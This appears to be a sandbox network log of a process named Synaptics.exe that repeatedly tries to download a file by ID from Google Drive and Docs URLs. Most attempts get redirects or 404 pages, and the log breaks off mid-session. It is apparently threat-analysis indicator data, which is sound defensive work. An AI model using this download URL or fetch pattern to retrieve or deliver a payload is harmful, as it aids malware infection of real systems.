                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            47 | 192.168.2.9 | 49959 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:51 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:52 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC46gvwpuLWds7h9u7lZ6o86Z4IMGuFfONnNlzF2URs8PiH-leQ5UmpaM2JXAX5tXeJGwTUOh0I
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:52 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-BdrCW2XPztuyzis3Ef23rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:52 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-02 19:29:52 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="7vm4TcMCPtvIxb6wMJUXHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2025-01-02 19:29:52 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.9 | 49960 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:51 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
2025-01-02 19:29:52 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:52 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-cxwuMixRfqXoCDLGyCPcgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.9 | 49961 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:52 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:52 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7J-nxq6HqfLMYQwZ_QoJWWVk4MszAoPGD8_BrDFzzOuK4UTJB3md9PQtqgnzvKHwsw_2ha0vs
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:52 GMT
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-N3xFILOYhZaGphVIq2ge3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:52 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-02 19:29:52 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="fggc_rpKEepgXceO3IUbig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2025-01-02 19:29:52 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.9 | 49970 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:52 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.9 | 49968 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:52 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.9 | 49971 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:53 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
2025-01-02 19:29:53 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:53 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-NCajbRUh8_mifz2vaWNyZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.9 | 49978 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:53 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
2025-01-02 19:29:54 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:53 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GR1f49Z7zqmusldxUXi2jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.9 | 49986 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:54 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
2025-01-02 19:29:54 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:54 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-hwYQ1kib8iJnRYhf8rSVuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.9 | 49985 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:54 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:54 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC68IMqGZPP_J7AFqIJnOfTnvCm4yWsBvlpkpN-yJPBGL8xfigLlcwt9NDbh_xiHc7aI
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:54 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-8NyWU9oTUVYrSyKfg1ZMLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:54 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:29:54 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="iMtiXs6204lkXen1viFQ6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:29:54 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.9 | 49988 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:54 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:55 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7sfKN0H37Su_9SJUFc-2GXhrwQoYbAj0saupF9Ob5GAqecY77dKUsfJ0j4uOeIaqDS
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:55 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-etMRvFvIMZcD9ZcYk71Skg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:55 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:29:55 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="szsQNL5FyuSxWsP-wibTeg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:29:55 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.9 | 49989 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:54 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
2025-01-02 19:29:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:55 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-iT5lVWVgE7ke6-SiFI2f5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.9 | 49996 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:55 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:56 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4bJT-AK1xgGw6CXIPxi7ORxN_wPPXBsmFov6Lh2T1bW8dBHsg5gOhq56EmJ0BwNpZS
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:55 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
